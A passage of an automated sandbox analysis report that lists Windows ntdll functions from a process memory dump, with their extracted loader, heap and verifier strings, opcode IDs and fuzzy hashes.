                                                                                                  • Instruction Fuzzy Hash: 9351F075A06345DFEB08CFA4C58479DBBF1BF84318F644459D801AB281DBB4AB82CF80
                                                                                                  Function 32578633 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • VerifierDebug, xrefs: 32578925
                                                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 325786BD
                                                                                                  • HandleTraces, xrefs: 3257890F
                                                                                                  • AVRF: -*- final list of providers -*- , xrefs: 3257880F
                                                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 325786E7
                                                                                                  • VerifierDlls, xrefs: 3257893D
                                                                                                  • VerifierFlags, xrefs: 325788D0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                  • API String ID: 0-3223716464
                                                                                                  • Opcode ID: 6b01034e9bdbc8aa11b9f4347eec97ef31756a161007dc9b803d6a83b6f22260
                                                                                                  • Instruction ID: 20ddfb17727412210ff6f1b0585a351af642a28e1c00b3b53b51921d0fa1ba1a
                                                                                                  • Opcode Fuzzy Hash: 6b01034e9bdbc8aa11b9f4347eec97ef31756a161007dc9b803d6a83b6f22260
                                                                                                  • Instruction Fuzzy Hash: 63911072981351EFE311CF2C9988B9ABBA5AF80728F844C58F9416B241CB70DF05DB92
                                                                                                  Function 3251237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • LdrpDynamicShimModule, xrefs: 3255A7A5
                                                                                                  • DGL2, xrefs: 32512382
                                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3255A79F
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 3255A7AF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: DGL2$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-1134985220
                                                                                                  • Opcode ID: 1b69afe3170f0d546fe8f7272e9ff0c3d0c180642eb10733fc8417e69c5dc865
                                                                                                  • Instruction ID: 3b7ded4dca1252e201bc219bc834dff51295e7384ffff3f9b20e6b8bca7abbf3
                                                                                                  • Opcode Fuzzy Hash: 1b69afe3170f0d546fe8f7272e9ff0c3d0c180642eb10733fc8417e69c5dc865
                                                                                                  • Instruction Fuzzy Hash: 9C314A75A51200FBF7149F18C890BA97BB5FBC4764F24045AF902B7251DB70AB83CB90
                                                                                                  Function 324EF113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                  • API String ID: 0-523794902
                                                                                                  • Opcode ID: 24ccc088c92a84d1acfa8769405346672bd14457ef484779bed9d6c106e7bda7
                                                                                                  • Instruction ID: 3b2cd44bcc81d20db1ca0d4315eb2585fd603b16adbecd633a4df651313820af
                                                                                                  • Opcode Fuzzy Hash: 24ccc088c92a84d1acfa8769405346672bd14457ef484779bed9d6c106e7bda7
                                                                                                  • Instruction Fuzzy Hash: 5142CC752053819FE305CF28C884B2ABBE5FF84389F45496DE896CB351DB74DA82CB52
                                                                                                  Function 3251510F Relevance: 7.9, Strings: 6, Instructions: 434COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.Q2
                                                                                                  • API String ID: 0-3982503027
                                                                                                  • Opcode ID: 94a20686a8ed4cc19628262c1ee1ec58f00a3239d8f6eaf817a933e5eafe08d3
                                                                                                  • Instruction ID: 5d4f781f63ccf4b6dac58cf982bf029b93e3cc35510bc7256a3cf19f12859ee9
                                                                                                  • Opcode Fuzzy Hash: 94a20686a8ed4cc19628262c1ee1ec58f00a3239d8f6eaf817a933e5eafe08d3
                                                                                                  • Instruction Fuzzy Hash: F0F13CB6D11218EFDF16DF98C984A9EBBB8FF48754F50446AE501A7210DBB4AF01CB90
                                                                                                  Function 3250B0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                  • API String ID: 0-122214566
                                                                                                  • Opcode ID: 3b0158935fcaa03a747157117803e0f95babd034b919adf4b130ffa29b182bb8
                                                                                                  • Instruction ID: 8561c1bcb5da0d94e174f325db7516162262f253f965bd8307575156c77582f8
                                                                                                  • Opcode Fuzzy Hash: 3b0158935fcaa03a747157117803e0f95babd034b919adf4b130ffa29b182bb8
                                                                                                  • Instruction Fuzzy Hash: AAC12D75A00359ABEB148B64CCD57BE7B61AF49308F64C46ADC029B290DF74DF44CB90
                                                                                                  Function 3252631F Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-792281065
                                                                                                  • Opcode ID: c76d312aef71df615e366f50ea5cada9e6880a47d2a6a261636139dfda34569d
                                                                                                  • Instruction ID: 0ed484aa60b06990787e429a7187bf9db9d997f8ecc724f60c3c8ba564fe6d97
                                                                                                  • Opcode Fuzzy Hash: c76d312aef71df615e366f50ea5cada9e6880a47d2a6a261636139dfda34569d
                                                                                                  • Instruction Fuzzy Hash: D7914870A53325EFE725CF14C944BFE7BA1AF50769F401469EA106B2C1DBB09B42CB90
                                                                                                  Function 32500680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                  • API String ID: 0-4253913091
                                                                                                  • Opcode ID: 6ed4c6a6948422937376ee3a632170a1f90ce69240cd22f77669f11aa0f215e6
                                                                                                  • Instruction ID: aeb32cf029b71c672bea017787b78e1767490b1bd9f7b3d8e46373f03f73310d
                                                                                                  • Opcode Fuzzy Hash: 6ed4c6a6948422937376ee3a632170a1f90ce69240cd22f77669f11aa0f215e6
                                                                                                  • Instruction Fuzzy Hash: 7AF1BF75A00605DFEB09CF69C894B6ABBF5FF44344F208569E8069B391DB74EA81CF90
                                                                                                  Function 32519723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                  • API String ID: 3446177414-2283098728
                                                                                                  • Opcode ID: 1084618e707913801d2493205bf2c12d4047e7b32ffc1b9c467914d0c3c56734
                                                                                                  • Instruction ID: c1a5e2130b685b7c6fd38e1353290571a768db8193404f650983bc36793118b9
                                                                                                  • Opcode Fuzzy Hash: 1084618e707913801d2493205bf2c12d4047e7b32ffc1b9c467914d0c3c56734
                                                                                                  • Instruction Fuzzy Hash: EC510375601701ABFB14DF38C880B59BBA1BFC5364F540A6DE84397291EBB0BB45CB82
                                                                                                  Function 3252C640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 325680E9
                                                                                                  • Failed to reallocate the system dirs string !, xrefs: 325680E2
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 325680F3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 3446177414-1783798831
                                                                                                  • Opcode ID: 311564f9ffe8cef74b209594b266669552435197ff9e445b7b72afae8d4faf67
                                                                                                  • Instruction ID: dc04bd52722138e42e0b877748ddb510188503f3f240d5db6a7ecd5b5a365fae
                                                                                                  • Opcode Fuzzy Hash: 311564f9ffe8cef74b209594b266669552435197ff9e445b7b72afae8d4faf67
                                                                                                  • Instruction Fuzzy Hash: D04114B5562300EBD720DF28CC44B9B7BE8AF84795F41592AF848A72D1DB70EB41CB91
                                                                                                  Function 325743D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 32574508
                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 32574519
                                                                                                  • LdrpCheckRedirection, xrefs: 3257450F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                  • API String ID: 3446177414-3154609507
                                                                                                  • Opcode ID: 843d04358b053cd02e71a1f7f746fe6921997e7f18bdcf1e0ebf30f119cc60c7
                                                                                                  • Instruction ID: b2cd6a0352a955bf2f7655b34dc872bb80b7a71d12504617435be54e1f093c28
                                                                                                  • Opcode Fuzzy Hash: 843d04358b053cd02e71a1f7f746fe6921997e7f18bdcf1e0ebf30f119cc60c7
                                                                                                  • Instruction Fuzzy Hash: E141DF76685321DBDB10CF5CC840A56BBF6AF88796F050AB9ECC8E7251DB30DA00DB91
                                                                                                  Function 325CACEB Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID:
                                                                                                  • API String ID: 3446177414-0
                                                                                                  • Opcode ID: f72e956ac1848aab8816b76ba4e699c5d3827b8b4cf3c1a3863a293b3bf8b385
                                                                                                  • Instruction ID: 6aa78071efe96d7e7abc621165338f10effd45ab135b54d7758a0a780e82ff4a
                                                                                                  • Opcode Fuzzy Hash: f72e956ac1848aab8816b76ba4e699c5d3827b8b4cf3c1a3863a293b3bf8b385
                                                                                                  • Instruction Fuzzy Hash: 95F1E8B7E006259BCB08CFA8C99067DFFF5AF88210B55416DD496EB380EA74EB41CB50
                                                                                                  Function 324E7662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                  • API String ID: 0-3061284088
                                                                                                  • Opcode ID: 037ee038204aa4bd1927ddf93fbd7f9aa206e9ac72b692de3b7cca137b600136
                                                                                                  • Instruction ID: fcccf96571e18332b5217adc0b5631440e7f0f10a822a56c9f9b0afe675e251c
                                                                                                  • Opcode Fuzzy Hash: 037ee038204aa4bd1927ddf93fbd7f9aa206e9ac72b692de3b7cca137b600136
                                                                                                  • Instruction Fuzzy Hash: 6C01707A016150FFF345872DD41AF86BBE8FB41737F15488DF0014B790CEA59940DA50
                                                                                                  Function 324F0485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • kLsE, xrefs: 324F05FE
                                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 324F0586
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                  • API String ID: 3446177414-2547482624
                                                                                                  • Opcode ID: b9080ac5cf02c97148a1736da4add6bd123c9628714a465c4dd810ef4dcf5d89
                                                                                                  • Instruction ID: 4e40a9d1d23097710f576fba77dfcb72747744163903899532e1f3449c7d64ab
                                                                                                  • Opcode Fuzzy Hash: b9080ac5cf02c97148a1736da4add6bd123c9628714a465c4dd810ef4dcf5d89
                                                                                                  • Instruction Fuzzy Hash: 2151DFB5A00746EFEB14CFA4C4407EAB7F4AFC4304F00A83ED99597244EBB29645CBA1
                                                                                                  Function 324FA2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                  • API String ID: 0-379654539
                                                                                                  • Opcode ID: 5845111c47ecbb19d1e1a511e8d42ea506ed89076eb42200f025d792ec77859b
                                                                                                  • Instruction ID: 4665dbfc1cadbbf74d64085d7a8384d1de32b0996c6169f118a7e3072db78e78
                                                                                                  • Opcode Fuzzy Hash: 5845111c47ecbb19d1e1a511e8d42ea506ed89076eb42200f025d792ec77859b
                                                                                                  • Instruction Fuzzy Hash: 46C18B74108392DFE315CF58C540B5AB7E4BFC4B48F40896AF895CB250EB75CA8ACB52
                                                                                                  Function 32528322 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 3252847E
                                                                                                  • LdrpInitializeProcess, xrefs: 32528342
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 32528341
                                                                                                  • @, xrefs: 325284B1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-1918872054
                                                                                                  • Opcode ID: 4092d92cd8763e8fbd899e9155aced30fc9dc54e68270da1ba29b8b360693887
                                                                                                  • Instruction ID: 6938283e262d3ca5aa7b53120b53505e4ad6c7c522a9595ad6f013cbb14b4ce3
                                                                                                  • Opcode Fuzzy Hash: 4092d92cd8763e8fbd899e9155aced30fc9dc54e68270da1ba29b8b360693887
                                                                                                  • Instruction Fuzzy Hash: 3D918371509340AFE721DF60DD44FABBBECAB84788F80592DFA84D2190E774DA44CB62
                                                                                                  Function 3252265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 32561FE8
                                                                                                  • .Local, xrefs: 325227F8
                                                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 32561FE3, 325620BB
                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 325620C0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                  • API String ID: 0-1239276146
                                                                                                  • Opcode ID: 2644910c1396cd62d7274405c527786f93d6c9bb3c73ae2e8f9e7f85f16a50e8
                                                                                                  • Instruction ID: ddeec0fdc29d002f59b14ffdb5cb74ad431b617dfed4a0e2ebadca4a07c4e263
                                                                                                  • Opcode Fuzzy Hash: 2644910c1396cd62d7274405c527786f93d6c9bb3c73ae2e8f9e7f85f16a50e8
                                                                                                  • Instruction Fuzzy Hash: 11A17A7990132D9FDB24CE64C884BA9B7B0BF58368F5045EAD808E7295DB709F81CF90
                                                                                                  Function 3258327E Relevance: 5.2, Strings: 4, Instructions: 236COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit$X}M2
                                                                                                  • API String ID: 0-624072958
                                                                                                  • Opcode ID: 4a3ec16f5347ec1e94edefb40fee7bf2ab1f3bbe0c0ba87063218a0fa9baf3ea
                                                                                                  • Instruction ID: 599f8f758b5ac5bb82a93a24d77d644f03a94f2cb176884206f65ffce0949190
                                                                                                  • Opcode Fuzzy Hash: 4a3ec16f5347ec1e94edefb40fee7bf2ab1f3bbe0c0ba87063218a0fa9baf3ea
                                                                                                  • Instruction Fuzzy Hash: F9817A71619340AFE711CB24C984B6ABBE8FF94754F404969F988DB290EFB4DE04CB52
                                                                                                  Function 324FB360 Relevance: 5.2, Strings: 4, Instructions: 221COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LUL2$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                  • API String ID: 0-302139221
                                                                                                  • Opcode ID: bc780ae12db215dc1638405130ccb1e4a33cf92529aec062c667cb98a7ffa8d7
                                                                                                  • Instruction ID: eba2a731e304f078bb8183f48af92ed51b4d6d7710907f1a252840a5ce23f8be
                                                                                                  • Opcode Fuzzy Hash: bc780ae12db215dc1638405130ccb1e4a33cf92529aec062c667cb98a7ffa8d7
                                                                                                  • Instruction Fuzzy Hash: 4A910075A04305EBEB11CF54C54079DB7B0FF8A358F24819AE805AB380DB79DE81CB90
                                                                                                  Function 324F63CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 32550DEC
                                                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 32550E2F
                                                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 32550E72
                                                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 32550EB5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                  • API String ID: 0-1468400865
                                                                                                  • Opcode ID: 5cb99d5df195bba50e6ab9eb9657b4761c2235bc95a19ef3013d7af07c78ed83
                                                                                                  • Instruction ID: 3cc7a279f579f5cc61cb801265f14ac94a41bad13d2c667d5db51f142bde5ccb
                                                                                                  • Opcode Fuzzy Hash: 5cb99d5df195bba50e6ab9eb9657b4761c2235bc95a19ef3013d7af07c78ed83
